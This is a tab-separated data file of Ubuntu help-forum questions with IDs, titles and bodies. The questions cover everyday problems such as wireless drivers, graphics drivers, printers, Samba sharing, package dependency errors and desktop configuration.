251012	dell vostro 2520 switch off bluetooth	i 've got vostro 2520 . the thing that annoys me is that by default it switches on bluetooth as addition to wifi & i have to switch it off after every reboot : ( can i save the state switched of for bluetooth as a default ? this is to prolong battery life . i did n't find an answer to this googling . could you help me ?
251014	why is chromium shutting down while downloads are in progress ?	chromium used to confirm exit if there are any downloads active , is it something i can turn on/off or is it an ubuntu bug ? ii chromium-browser 23.0.1271.97-0ubun chromium browser no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise
251015	installing canon color imageclass mf8380cdw drivers in ubuntu 12.10	i am trying to install the drivers for a canon color imageclass mf8380cdw in a 64-bit installation of ubuntu 12.10 . since ubuntu did not contain the drivers , i needed to download the drivers for this printer from canon 's website . since it only contained 64-bit drivers for an rpm-based distribution of linux , i needed to use alien to convert the packages to the .deb format before installing them . however , i am not sure how to proceed from here . any help would be appreciated . thanks .
251016	ubuntu phone on pantech	i really admire the pantech line-up with the cheap unlocked phone options . i understand that we have only seen ubuntu phone running on the galaxy nexus , however i was wondering if any pantech users would be able to estimate the possible availabilty for ubuntu on pantech burst or other devices in the next year ?
251017	strange wifi trouble caused by update ?	my wifi connection has been working flawlessly for 2 years running first ubuntu 11.04 and gradually upgrading to 12.04 . a few days ago the connection to my router suddenly stopped working after a restart ( it had been connected right up until the restart ) . the network icon on top shows that it is trying to connect and after a while it stops and tells me i am disconnected . all other devices ( 6-7 or so ) connected to the router continue to access as usual so i do not think it has anything to do with the router itself . also i found out that i have no problem connecting to the hotspot of my cell phone . both on my cell and on the router i have wpa-psk , but i guess that they would be using different standards ( n on router versus b/g when using phone hotspot ? ) . any ideas on what the problem might be ? tips on how to debug it ? i did install the latest upgrades through synaptic prior to restarting , can i have upgraded to a broken driver or something ? here is the info from lshw -c : *-network beskrivning : trådlöst gränssnitt produkt : bcm4313 802.11b/g/n wireless lan controller tillverkare : broadcom corporation physical id : 0 bus info : pci @ 0000:44:00.0 logiskt namn : eth1 version : 01 serienummer : ac:81:12:3d:93:9a bredd : 64 bits klocka : 33mhz förmågor : pm msi pciexpress bus_master cap_list ethernet physical wireless konfiguration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg
251019	the disk tray wo n't open when i press the button	i 'm trying to open the disk tray in lubuntu 12.10 and nothing is happening . this ca n't be a mechanical failure because it works fine in windows xp , and i 'm posting it here because there are no packages i know of related to disk trays at all . i can also open the tray when i 'm in the bios , so i must be missing a driver .
251021	bad sound quality with headphones	i am getting poor sound output when i connect headphones to my laptop . the output through the speaker is fine , though . the sound volume on connecting the headphones reduces drastically and the quality of the output also decreases . this issues is with both audio and video files . any help ?
251022	why is my eth0 interface not detected when installing snort ?	i am trying to install snort on ubuntu server in vmware . it works fine before the setting up network cards . i 've edited /etc/network/interfaces with the following data : # # # # # # # primary address auto eth0 iface eth0 inet static address 192.168.1.1 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 # # # # # # # second address auto eth1 iface eth1 inet manual then i do ifconfig eth1 up after when i try to run sudo /etc/init.d/networking restart it works fine , but when enter sudo ifconfig eth1 up it gives error eth1 : error while getting interface flags : no such device i have also tried , without root sudo service networking restart no effect . can anyone help me out with this ? very much appreciated .
251028	gnome-terminal hangs on start in kde	i have multiple desktops installed ( ubuntu 12.10 ) , and while logged in with kde i see the following strange behaviour . when starting gnome-terminal , it opens a window with the title and menu rendered , but no content . the background is the same as the frame , and hangs . the menu will not respond , and the window will not close cleanly ( not responding to close signal ) . if i launch it from another terminal , there is no output . if i start it as root ( sudo gnome-terminal ) it runs fine . it works properly when using unity dm as a normal user , but not kde . i should also add that i 'm using kdm instead of lightdm . i 'd really like to run gnome terminal rather than konsole in kde as i 'm trying to get around the ssh askpass integration problems in konsole ( keyring integration , etc ) . i 'd also like it to work just on principle . any ideas ?
251029	vlc no gui from build	when i start vlc ( installed version ) , i get output like the following in a terminal window and then a new vlc player in graphical window : $ vlc vlc media player 2.0.5 twoflower ( revision 2.0.5-0-g1661b7d ) [ 0x9025908 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . when i start vlc from the bulid , i get the following output with no graphical window player appearing at all : $ ./vlc vlc media player 2.1.0-git rincewind ( revision 1.3.0-git-4793-g08223d4 ) [ 0x88f6a40 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0x8909d08 ] [ cli ] lua interface : listening on host `` *console '' . vlc media player 2.1.0-git rincewind command line interface initialized . type `help ' for help . how do i start a new vlc gui window with the new build ? are there any lua dependencies i need to satisfy perhaps ?
251031	how can i connect to netware , ipx and use btrieve ?	i have approximately 30 pcs connected in a network with netware 6.5 and 5.1 servers using the ipx/spx protcol . we still run this because the program runs with btrieve ( bd netware and work only in ipx ) , we ca n't change the software installed , so we 're starting to migrate to ubuntu . i can see the directory from the server netware with ncpfs packet , and run the program , but in the moment to execute brequest ( utility of btrieve ) the dosbox tells me that spx.com is not loaded . so , what can i do ? pd : just to be clear , we ca n't change the software in use now , because of valid unrelated reasons . i really need to connect ubuntu to novell and run the utility brequest in a dosbox for example . any help is appreciated
251035	i 'm having issues running ubuntu from flash drive ( images inside )	i have followed the instructions to put ubuntu 12.10 onto a flash drive . i then shut down my computer and booted from the flash drive . i get the ubuntu loading screen , but after a while i am met with the following output to the screen ( first image ) . the output is then followed by a screwed up screen ( second image ) . this then loops over and over again . i am trying to boot ubuntu from a sandisk flash drive . my laptop is a asus g51-jx-x1 with a nvidia 360m graphics card and an intel i7 . my video drivers are current . i can provide more specs if needed . thanks ! first image ( http : //i.imgur.com/o9kzyqz.jpg ) second image ( http : //i.imgur.com/ctimn3f.jpg )
251038	ca n't mount my internal harddrive	im trying to mount my internal hard drive . whenever i click on my 320 gb hard disk a pop-up comes up saying `` unable to mount location , cant mount file '' thats all it says and i just got started using edubuntu less then an hour ago so i dont have that much knowledge with this so if the answer could be written in terms a begginer would understand that would be awesome .
251040	i have some problem with my boot-up of ubuntu 12.10	every time i boot ubuntu this certain message comes up on a black screen- try ( hd00 ) ntfs5
251041	how to install lightdm-set-defaults ?	ubuntu wiki lightdm states : lighdm configuration is governed by the lightdm.conf file , however it 's not suppose to be directly edited , instead use : lightdm-set-defaults $ lightdm-set-defaults lightdm-set-defaults : command not found $ sudo lightdm-set-defaults sudo : lightdm-set-defaults : command not found $ lightdm -v lightdm 1.4.0 synaptic 0.75.12 'quick filter ' finds no matches on 'lightdm-set-defaults ' . how do i install 'lightdm-set-defaults ' ?
251043	how can i change the screen resolution on ubuntu 12.04 ?	i have ubuntu 12.04 installed alonside windows in dual-boot . after installing the latest nvidia drives ( 304.64 i believe ) the resolution dropped to 600x480 and it 's the only option available in the display menu in unity . my monitor 's resolution is 1360x768 , how can i chage the resolution to that ? thanks in advance .
251045	how can i run x on 1 out of 2 gpus connected ?	i have 2 gpu 's connected to my pc an amd radeon hd 7770 and a nvidia geforce 8600gt and i would like to run the x server only on the nvidia card . how can i do this ? edit : since my nvidia card is a no-go i swapped it for a radeon hd 4770 , the question remains the same although now i 'd like to use the hd 4770 . this is the output of lspci -nnk | grep -iea3 vga : 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati device [ 1002:683d ] subsystem : pc partner limited device [ 174b : e215 ] kernel driver in use : fglrx_pci kernel modules : fglrx , radeon 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati radeon hd 4770 [ rv740 ] [ 1002:94b3 ] subsystem : xfx pine group inc. device [ 1682:2900 ] kernel modules : radeon 02:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati rv710/730 hdmi audio [ radeon hd 4000 series ] [ 1002 : aa38 ] and this is the output of lspci -v it 's rather lengthy so i pasted it in here .
251049	something has stolen my ctrl+shift+f12 shortcut key after a recent update . how can i find out what has stolen it ?	i use this shortcut regularly inside intellij idea . and now it is stolen by something else . it is not displayed in the keybaord settings , and i could n't find it with gconf-editor . any ideas what app is that and/or how can i change it ?
251051	nvidia proprietary driver with ati opencl support	i am exploring with the toronto gpu programming meetup whether i can add an ati radeon card for opencl gpgpu computing to my rig with an existing nvidia gtx 680 . the specific idea is to have a radeon hd 7970 for opencl support , and a nvidia gtx 680 with binary drivers installed . i understand that the binary driver works by replacing a lot of the x/opengl stack . i also know that there is work on adding opencl to the opensource radeon driver & new gallium mesa stack , but that it is not done yet ( and not compatible with the binary drivers anyway ) . i also know best practice when switching from one video card to another using binary drivers is to completely scrub the drivers . but what i am not clear on as yet is the linkage between the stream sdk and the x/opengl stack , such that i can use part of the radeon driver for opencl support , but leave graphics to the nvidia stack . ideas that came to mind could include getting the the ati driver to install to a different location , or installing the nvidia stack over the amd stack ( hopefully leaving the opencl specific parts alone ) . note that i have no intention of video/graphics on the radeon card . it will only be used as a gpgpu . i am looking for specific examples of documentation of anyone who has accomplished this . google suggests is is possible with windows 7 , but my question is for ubuntu 12.10 64 bit . nouveau is not a solution for me at this time , as i am doing linux based gaming on this rig and do n't want to give that up . if there is a better place to post this question , please let me know . thanks to anyone with ideas or suggestions on how to proceed .
251057	recompile nginx with nginx-push-stream-module ?	i 've installed nginx on ubuntu with apt-get . now i need to somehow add the module : their install suggests to recompile nginx with the module : https : //github.com/wandenberg/nginx-push-stream-module/blob/master/readme.textile how can i do that when i have installed nginx with apt-get ? i want to keep all my current settings and just get the module in there some how
251062	system-config-printers issue	i had initially configured a printer and the printer device stopped working so i removed it and reconfigured the printer incorrectly . i then removed that printer and reconfigured it correctly only to find that it still was not working . i completely removed all printers and rebooted my machine and tried to reconfigure again ; only to see it still was not working . i then reconfigured but renamed the name of the printer and it worked just fine . so my questions are : where is each printer configuration file saved at ? where is the printer spool directory ?
251067	default disk partitions	when i installed ubuntu 12.10 , i installed it onto a 500 gb hard drive using the default partitioning . looking at the hard drive in disks i see the main partition ( /dev/sda1 = 496 gb ) and the swap partition ( /dev/sda5 = 4.3 gb ) . i also see another partition ( /dev/sda2 = 4.3 gb ) , which is not mounted . its type is extended and its contents are extended partition . here is the output from ls /dev/sda* : /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 why are n't there partitions 3 & 4 ? and what is /dev/sda2 for ?
251070	appearance icon has disappeared from system settings menu	i go to system settings and appearance is gone . i tried searching it in the dash and it is not there . when i right click the desktop and select `` change background '' the system settings window opens . i tried going to the ubuntu software center and installing it from there it installed and popped up on my launcher . i tried clicking it and it opened up the system settings menu and appearance was still not there . i unlocked it from my launcher and searched for it in the dash and it was not there . please help .
251072	is the clear stick atlas 4g usb modem stick compatible with ubuntu ?	a company named clear provides 4g internet services and sells devices for it , such as the clear stick atlas . that device is supposedly to work on linux , androidâ˘ and chrome os . they have a disclaimer that says that linux , androidâ˘ and chrome versions must support remote network driver interface service specification ( rndis ) or communication device class ( cdc ) . has anyone had any luck with any of these firmware/drivers or devices purchased from clear ?
251074	uninstall ubuntu 12.10 and revert back to windows 7	i just installed ubuntu 12.10 and regretted it almost immediately . do n't ask why , i was just wondering if i can completely uninstall ubuntu and then go back to windows 7 with my original c : drive at full capacity ( getting rid of the ubuntu partition ) . if so , how ?
251077	can i install torcs 1.3.3 from ubuntu 12.10 repo on ubuntu 12.04 by directly downloading the .deb packages ?	here 's the deb link : http : //pkgs.org/ubuntu-12.10/ubuntu-universe-i386/torcs_1.3.3-5ubuntu1_i386.deb.html i think to install torcs i need to install torcs-data_1.3.3-5ubuntu1_all.deb , torcs-data-cars_1.3.3-5ubuntu1_all.deb and torcs-data-tracks_1.3.3-5ubuntu1_all.deb should i install this way ? edit :
251081	adobe flash installation help	so i 'm trying to install adobe flash and i 'm quite new at all this . i 've googled around but i ca n't find any sources that have worked . right now im at https : //help.ubuntu.com/community/java and when i click install links i get sent to an error page that says `` firefox ca n't find the file at apt : //openjdk-7-jre . '' so what do i do ?
251083	hp probook 4530s overheating problem ( ati/radeon )	well , this is a painful topic , because i see , that graphic card developers do n't want to support linux environment with their drivers . i have hp probook i5-2430m cpu , ati radeon hd 6490m/ intel hd graphics 3000 and 4gb of ram . i tried different drivers but when i do simple tasks , my pc is overheating and cpu temperature goes between 70-80 degrees celsius . while working on windows , nothing gets hot while doing the same tasks . has anyone found any solution for this ? i assume that switching to intel graphics could reduce the temperature , but then my radeon gets useless and thats no good .
251085	tata docomo photon 3g not working on 12.04 lts	i recently upgraded from tata photon+ to tata docomo photon 3g , however ubuntu is not recognizing the device itself . i tried manually adding the device in mobile broadband section , using different apns and service provider names as suggested in few earlier questions . the device is zte mf 190 ( hsupa ) . what do i do ?
251089	mac keyboard backlight ubuntu 12.04	running ubuntu 12.04 , i ca n't get the keyboard backlight on a macbook pro ( mid 2012 ) to turn on . when i press the brightness button , the display shows up on full but the lights do not turn on . it shows full always on the screen , but they never turn on . i do n't really care about getting the keys to work , but i just want something like a terminal command just to get them on . ( i do n't care about the intervals , i just want the backlight on ! ! ! ) any help is great , thanks , skyler
251091	accessing share folder ( samba ) on newly installed harddisk	i am able to acccess my samba shares on my main harddisk just fine on all networked pc 's . however when i installed a new harddisk and setup everything the same way as the old folders , when trying to connect via my windows 7 laptop i get : windows can not connect to \\computer\folder i have double checked all settings and everything is exactly the same in the smb.conf and folder permissions .
251095	lost permission of home directory	i recently messed up my ubuntu setup , so i re-installed and choose to use my existing home directory . now i can not launch ubuntu-tweak as myself , but am able to do so with sudo command . any help will be appreciated . also as a result it seems my chrome has not yet updated to the new extensions i installed from other machines . the tweak log on /home/sarvesh/.config/ubuntu-tweak/*.log is empty also when i command users , i see my username three times .
251096	no response from ubuntu one oauth request	according to the documentation at https : //one.ubuntu.com/developer/files/store_files/cloud , i should be able to get files with 'https : //one.ubuntu.com/api/file_storage/v1/~/ubuntu one ' , but temporarily renamed to 'https : //files.one.ubuntu.com/~/ubuntu one ' . i 'm getting no response from either , though my access token is successful and i 'm able to get : object ( stdclass ) [ 230 ] public 'visible_name ' = > string 'username' public 'root_node_path ' = > string '/~/ubuntu one ' ( length=13 ) public 'user_node_paths ' = > array ( size=0 ) empty public 'resource_path ' = > string '' ( length=0 ) public 'user_id ' = > int number public 'max_bytes ' = > int number public 'used_bytes ' = > int number is there something wrong with the server or my account ?
251099	why are there two users with same name ?	when i execute users command , it output two users with same name . why are there two users ? i 'm pretty sure that i created just one user . i.e username @ computer : ~ $ users gives following output username username
251103	unity `` is n't supported '' after installing nvidia website drivers . computer has optimus . trie	this all started when i went to the nvidia website and got the latest driver for my gforce 555m . i downloaded and installed linux x64 ( amd64/em64t ) display driver , version 310.32 . there were several errors , including it `` not running '' the pre installation script , and also many errors about not copying files . i ca n't remember exactly what it said as that was a while ago . after rebooting , unity fails to load , and i get all the windows with no tops , and no taskbar . i might add that i have an optimus laptop . i realized i should n't have installed that , and i tried many things to fix it . i previously had bumblebee installed , and i removed that in an attempt to fix . when i use `` unity '' command from command line it tells me that my system is n't supported by unity . i know for a fact that it is `` supported '' because it was working before i installed the driver . i also have done # apt-get purge nvidia* in an attempt to undo what i have done , but that did n't help . when i do lspci -k | grep vga , only my intel driver shows up . before i was doing all this i had my intel driver and my gforce . i have ubuntu 12.10 . any suggestions ? i have looked everywhere and nothing has helped . edit : i basically gave up on this issue and completely re installed ubuntu . for future users who have n't already completely destroyed their systems with nvidia drivers : this is what i did after i re installed . i did not do anything with nvidia-current or any other drivers , instead i ran : sudo add-apt-repository ppa : bumblebee/stable sudo apt-get install bumblebee bumblebee-nvidia after rebooting , and copying my personal files back into the new install , it works perfectly in a way i was never able to achieve before ! i now have no errors with unity , and i can use optirun to run with the gforce driver . i never got bumble bee to work on my old operating system btw . probably because i had installed nvidia-current .
251104	search in unity is very slow ?	am i able to turn off some search scope ? eg : turn off suggest . basically i want to search application only , so it should be super fast .
251106	android sdk manager not showing up ( ubuntu )	i am currently using ubuntu 12.10 , to begin with android i downloaded the adt bundle from http : //developer.android.com/sdk/index.html , it contains eclipse and all other supporting libraries in itself so all i have to do is click the eclipse icon twice and it starts working . after launching eclipse , everytime in click on the sdk manager it shows a popup with progress bar and then disappears . does anyone else had the same issue or if someone can guide me the right way thanks
251114	how can i force my machine to get an ip address from my router ?	i had installed ubuntu server and had the router setup to assign the same ip address ( 192.168.0.10 ) every time the machine powered on . recently , i did a clean install of ubuntu server and now my machine wo n't connect to the internet . i think this is because i mistakenly set it up with a static ip address in the install process . how can i configure ubuntu to always ask for an ip address from the router ? while researching this , it seems like i need to configure my machine to use dhcp . my /etc/networking/interfaces file has this : auto lo iface lo inet loopback auto eth0 iface eth0 inet static # this is why i think it 's setup as a static ip address 192.168.0.10 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 # i 'm pretty sure i typed these in during setup ; they have nothing to do with a dns dns-nameservers 192.168.0.1 dns-search ironjack.spacetechnology.net i tried to change the static to dhcp and restart the networking script ( like this question suggested ) , but that did n't work .
251116	why ca n't i install these packages ?	i want to install curl library in ubuntu 12.04 lts . for that i use the following command sudo apt-get install libcurl4-openssl-dev . but i got the errors as ajay @ ajay-k54l : ~ $ sudo apt-get install libcurl4-openssl-dev [ sudo ] password for ajay : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-openssl-dev : depends : libkrb5-dev but it is not going to be installed depends : librtmp-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . whenever i try to install thee dependencies , it shows that packages already installed : ajay @ ajay-k54l : ~ $ sudo apt-get install -f libkrb5-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libkrb5-dev : depends : krb5-multidev ( = 1.10+dfsg~beta1-2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . ajay @ ajay-k54l : ~ $ sudo apt-get install -f krb5-multidev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : krb5-multidev : depends : libkrb5-3 ( = 1.10+dfsg~beta1-2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is to be installed depends : libk5crypto3 ( = 1.10+dfsg~beta1-2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is to be installed depends : libgssapi-krb5-2 ( = 1.10+dfsg~beta1-2 ) but 1.10+dfsg~beta1-2ubuntu0.3 is to be installed e : unable to correct problems , you have held broken packages . ajay @ ajay-k54l : ~ $ sudo apt-get install -f libkrb5-3 reading package lists ... done building dependency tree reading state information ... done libkrb5-3 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . what do i need to do ? i have tried following command apt-cache policy libkrb5-3 krb5-multidev libk5crypto3 libgssapi-krb5-2 libcurl4-openssl-dev and it gives me output as : ibkrb5-3 : installed : 1.10+dfsg~beta1-2ubuntu0.3 candidate : 1.10+dfsg~beta1-2ubuntu0.3 version table : *** 1.10+dfsg~beta1-2ubuntu0.3 0 100 /var/lib/dpkg/status 1.10+dfsg~beta1-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ precise/main amd64 packages krb5-multidev : installed : ( none ) candidate : 1.10+dfsg~beta1-2 version table : 1.10+dfsg~beta1-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libk5crypto3 : installed : 1.10+dfsg~beta1-2ubuntu0.3 candidate : 1.10+dfsg~beta1-2ubuntu0.3 version table : *** 1.10+dfsg~beta1-2ubuntu0.3 0 100 /var/lib/dpkg/status 1.10+dfsg~beta1-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libgssapi-krb5-2 : installed : 1.10+dfsg~beta1-2ubuntu0.3 candidate : 1.10+dfsg~beta1-2ubuntu0.3 version table : *** 1.10+dfsg~beta1-2ubuntu0.3 0 100 /var/lib/dpkg/status 1.10+dfsg~beta1-2 0 500 http : //in.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libcurl4-openssl-dev : installed : ( none ) candidate : 7.22.0-3ubuntu4 version table : 7.22.0-3ubuntu4 0 500 http : //in.archive.ubuntu.com/ubuntu/ precise/main amd64 packages
251118	when i log in i ca n't do anything !	ok right when i login to ubuntu 12.10 installed via windows installer it [ ubuntu 12.10 ] shows the desktop background but not the menus , sidebar or the topbar i ca n't even start the terminal with the keyboard shortcut . i tried rebooting heap of times i even tried using the advanced options to repair broken packages . i only just installed it yesterday . am i doing something wrong ? thanks in advance ! p.s . i have previously rebooted about 5 time successfully .
251121	is it possible to run the iis web server on linux ?	is it possible to install iis on linux ?
251122	multiple versions of ruby without rvm	i have been trying to understand rvm and decided to do so by not using it and seeing the consequences . i am trying to see how i can manage different versions of ruby and their gemsets without rvm . i compiled ruby 1.9.1 from source on my ubuntu machine and found it in the path usr/local/bin/ruby . on saying ruby -v , i got the recently installed version . i did the same with ruby 1.8.7 and upon doing a whereis ruby , got the following output : usr/local/bin/ruby usr/local/lib/ruby when i say which ruby , i get the usr/local/bin/ruby path . the contents of usr/local/bin/ruby were the same as before but usr/local/lib/ruby upon doing an ls showed the following output : 1.8 1.9.1 gems site_ruby vendor_ruby on saying ruby -v i got the recently installed version . i did the same with ruby 1.9.3 and upon doing a whereis ruby , got the same output as before with the same contents . when i say which ruby , i get the usr/local/bin/ruby path . on saying ruby -v , i got the recently installed version . i fail to understand what is happening at this point of time . how are the different ruby versions being installed ? is there some way , i can manage multiple versions without rvm ( for learning purpose ) ? can i force all ruby versions to reside in the same directory in different folders and change the version to be used by setting the path perhaps ? also , if i look at local gems on the system , is there some way i can have a different set for each ruby version ? if i wanted to , at this point , how can i get rid of all ruby versions and gems from my system ?
251130	acer aspire one 725 unstable wifi connection	i installed 12.10 on an acer aspire one 725 . there were intermittent problems with the wifi disconnecting and connecting again and again . i thought this might be an issue with 12.10 . so i installed 12.04 . i 'm getting the same problems with 12.04 too . which probably points a finger at the hardware or drivers for the aspire one 725 . i have six other devices that are working perfectly with the same wifi router .
251131	how to increase video smoothness ?	i am having issues when watching videos/movies on my laptop with ubuntu 12.04 , had the same issues on kubuntu.when watching i can see small lines/video tearing , like it has lower than it should fps.this issue is n't visible if you do n't pay attention , but to my disadvantage i do pay attention . i tried , mplay , vlc , totem player , xbmc all the same.have proprietary drivers from amd on my amd hd4570 videoboard with 512mb dedicated memory . i have also 4gb of ddr3 ram so ram is n't an issue . cpu model is t4400 2.2ghz with 1mb cache .
251133	green dots on youtbe videos	this issue only comes out when watching youtube videos not on vimeo or others.the video says it all http : //youtu.be/dw_w0ao-t50
251138	how do i black list applications from the application indicator ?	i am trying to black list a program from appearing in the application indicator and wondering how i can achieve this . to give my question some context , steam appears in my top panel now and i wish to block it from appearing there or modify the icon .
251141	how to add option to make a file executable in pcmanfm 's context menu ?	nautilus and thunar have a such context menu option under properties/permissions , but not pcmanfm , lubuntu 's default file and desktop manager ( at least not yet in the present v . 1.1. ) . but under `` open with '' / ( again ) '' open with '' / '' custom command line '' , it is possible to add new custom commands . this creates a file with extension .desktop in ~/.local/share/applications which can be edited further so as to get a proper name and icon . what is the command to add in this way for making a file executable ? that is : how to use sudo chmod +x filename to make it work in this way ?
251147	lightdm background . where from ?	i 've changed my wallpaper , but on login screen old wallpaper is used . when i remove corresponding file - default background returns , when put file back - again the same . so , it is saved somewhere in configuration . i 've tried to fine it in gconf and dconf - no results . searching across files again without results , only in file /var/lib/accountsservice/users/nazar-pc , which is generated automatically , i guess , background section with my old background . how to set current wallpapper ? i know , that it is possible to change default background of login screen , but i want to solve this problem . ubuntu 13.04
251148	shutdown over ssh	i just installed a fresh ubuntu server 12.04 . i log in over ssh and use sudo -s to get root access . then i use shutdown now and the server closes the connection . i can not access the server over ssh , ftp or http anymore , it appears to be off . but it is n't . the server stays on , without being useful . why ? how can i shutdown the server with ssh ?
251152	lubuntu 12.10 bluetooth mouse disconnecting	in lubuntu 12.10 i use a bluetooth mouse , but it will not stay connected . i have to set it to connect as an input device and it will work fine for a little while . sometimes it disconnects in the middle of using it ; sometimes the mouse goes to sleep to save battery power and it will not reconnect after waking up . it always disconnects when i use the power button on the menu to bring up the shut down options . often i have to reconnect , disconnect , reconnect etc until the mouse starts working again . i also get messages like ubuntu has experienced an error , if you notice problems restart the system . is there any way to fix this besides waiting for the next version of lubuntu to come out and hoping that a fix for this is included ?
251154	long lines overlap in bash ps1 customized prompt	i have configured a fancy two-line ps1 bash prompt , with server name , time , user name and other useful variables . ps1= '' \n\ [ \033 [ 1 ; 34m\ ] \342\226\210\342\226\210 \u @ $ server_name '' '' $ bblue '' '' \w '' '' $ color_off \n\ [ \033 [ 0 ; 36m\ ] \342\226\210\342\226\210 \d \t $ \ [ \033 [ 0 ; 39m\ ] '' full github source here . the problem is that long lines are often wrapped around themselves , meaning that the new line overlaps the previous one . the problem is inconsistent : some lines are wrapped correctly , some are not . any idea how to fix this ?
251157	compiz desktop cube not working properly	on ubuntu 12.10 , i downloaded ccsm and enabled all the plugins required for desktop cube , like i usually did in 10.10 . but it 's appearing as it should be . i have attached a screenshot for your reference , how does it look like . can anyone please tell me , what would have went wrong ? screenshot :
251158	where is the cursor speed for mouse keys configured ?	i have mouse keys enabled on two computers running ubuntu 12.04 . on one of them , the cursor speed is reasonable . on the other one , even when using the same keyboard , the cursor moves unbearably slowly . setting the key repeat speed to max does not help . setting the mouse speed to max does n't help . setting the touchpad speed to max does not help . where 's the setting for the cursor speed with mouse keys ?
251159	accessing ubuntu from windows over samba : the specified network name is no longer available	i 've just installed samba on my ubuntu 12.04 machine and need to access it from windows server 2008 . $ sudo apt-get install samba $ service smbd status smbd start/running , process 23485 when i try to connect from the windows run dialog using \\192.168.1.111 ( verified using ifconfig ) i see the error message : \\192.168.1.111 the specified network name is no longer available this error pops up immediately . note that before installing smbd the error took a while to appear and was a generic can not connect to host type error . if i stop smbd , then the response goes back to timing out , so i know there 's connectivity between the boxes . what does this mean and what can i do to resolve this ?
251162	the gnu debugger - package operation failed	when i try to update the gnu debugger using the update-manager , i get the following error : '' package operation failed . the installation or removal of a software package failed . '' the output message is : ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 384037 files and directories currently installed . ) preparing to replace gdb 7.4-2012.04-0ubuntu2 ( using ... /gdb_7.4-2012.04-0ubuntu2.1_i386.deb ) ... unpacking replacement gdb ... dpkg : error processing /var/cache/apt/archives/gdb_7.4-2012.04-0ubuntu2.1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/gdb/python/gdb/printing.py ' , which is also in package gdb-msp430 7.2~mspgcc-7.2-20110612-1ubuntu1 no apport report written because maxreports is reached already processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/gdb_7.4-2012.04-0ubuntu2.1_i386.deb how to fix this ?
251163	is there a way to get broadcom 802.11ac wifi ( 43b1 ) working on ubuntu 12.10 ?	i have a dual boot of windows 8 / ubuntu 12.10 on an asus g75vx with broadcom 802.11ac network adapter device 43b1 . it seems that there exists no drivers for this adapter . i have done all of the instructions in the following post : no wireless connectivity after installing ubuntu 12.10 on windows 8 some info : sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . lspci -nn | grep 0280 03:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:43b1 ] ( rev 03 ) after doing the instructions of the link above , i realized i did n't have the option to install bcmwl-sta-source from synaptic . furthermore , from the list of devices that the bcmwl-kernel-source supports , it does n't include this specific model . is it not supported yet ? please let me know if anyone has gotten around to this issue . it will bug me alot if i just bought a new laptop and ca n't use the super fast wireless connection it provides : ( p.s in windows 8 it works fine .
251165	ubuntu as main os + windows on virtualbox ?	i 've been playing around with ubuntu only for some short time and i really enjoyed it . i want to buy a new laptop , and the thing is , although i have mac at work and it 's great to work with , i do n't want to pay 2500e for a new laptop . i 'd rather pay half and spend the rest on a trip to the caribbean . so , i was wondering if i could buy a powerful pc ( maybe i5 or i7 quad core and 16g of ram ) and use something stable and fast like ubuntu as my main os , with windows 7 setup in virtualbox . i need windows because i will still need to use flashdevelop ( only on windows ) and adobe flash ide and maybe adobe fireworks ( although i could get use to gimp instead ) . so how about if i dedicated at least 6g of ram to a virtual machine with windows for when i need to develop projecs with this software ? will it run fast enough ?
251167	xampp says it 's running but is not reachable	very awkward problem ... i do n't really know what the title should be ... i had xampp running , and firefox opened and i started the virtual machine using virtualbox . than i had some problem with workspace switcher ( i could n't press esc or windows key and the mouse did n't respond ... everything was blocked ) so i had to power off the laptop ( holding power button for 5 secs ) . when i started it again , xampp did n't work any more . i start it using `` /opt/lampp/lampp start '' normally but i ca n't reach it from firefox . just like apache is not running . i 'm using elementaryos on a 64 bit dell studio laptop and xampp 1.8.1 . are there any xampp gurus here ?
251169	uninstall photon plus gui from ubuntu 12.10	i installed tata photon plus graphical user interface , its working good . now i want to remove the application . give me a solution to uninstall ubuntu photon plus gui .
